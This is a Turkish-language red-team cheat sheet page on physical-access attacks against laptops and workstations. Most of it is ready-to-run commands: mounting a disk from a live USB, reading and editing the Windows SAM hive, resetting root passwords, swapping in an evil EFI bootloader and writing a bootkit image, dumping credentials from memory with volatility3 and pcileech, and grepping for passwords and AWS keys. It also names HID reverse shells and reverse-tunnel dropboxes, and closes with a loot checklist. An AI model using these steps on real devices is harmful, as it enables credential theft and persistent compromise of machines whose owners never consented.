Skip to content

Physical Attacks

hardware physical

Kısa fiziksel erişimde hedef: disk şifresini atlatmak değilse bile oturum, credential cache veya boot zincirinden dayanak üretmektir.

  1. Cihaz durumunu gözlemle (kilitli, BitLocker/FileVault, BIOS şifresi, USB boot).

  2. En ucuz vektörü seç: açık oturum HID, boot menü, outbound Ethernet.

  3. Live ortam veya evil maid ile kimlik/loot topla.

  4. Erişim kanıtını paketle; iz bırakmayı RoE’ye göre yönet.

Terminal window
# Live USB ile boot (BitLocker yok / recovery key var varsayımı)
lsblk -f
Terminal window
mount /dev/sda2 /mnt
Terminal window
cat /mnt/Windows/System32/config/SAM
Terminal window
chntpw -i /mnt/Windows/System32/config/SAM
Terminal window
# Linux: shadow sıfırlama
passwd root
BIOS şifresi + Secure Boot + disk crypto = boot menü tek başına yetmez
Terminal window
# Initramfs / EFI implant lab örneği
cp evil.efi /mnt/EFI/BOOT/BOOTX64.EFI
Terminal window
dd if=bootkit.img of=/dev/sdX bs=4M status=progress
Sonraki boot'ta credential logger / reverse shell
Terminal window
# Laboratuvar: RAM dump sonrası
volatility3 -f mem.dmp windows.hashdump
Terminal window
volatility3 -f mem.dmp windows.creds
Terminal window
strings mem.dmp | rg -i 'password|BEGIN RSA|AKIA'
Açık masaüstü → HID reverse shell
Ekran kilitli + USB boot açık → live OS loot
Ethernet jack → dropbox / reverse tunnel cihazı
Thunderbolt/DMA (eski) → PCILeech
Terminal window
pcileech dump -out mem.raw
[ ] kilit / disk crypto / BIOS durumu not edildi
[ ] HID veya boot vektörü denendi
[ ] loot (SAM/shadow/key) alındı veya erişim kanıtlandı
[ ] implant bırakıldıysa konum kaydedildi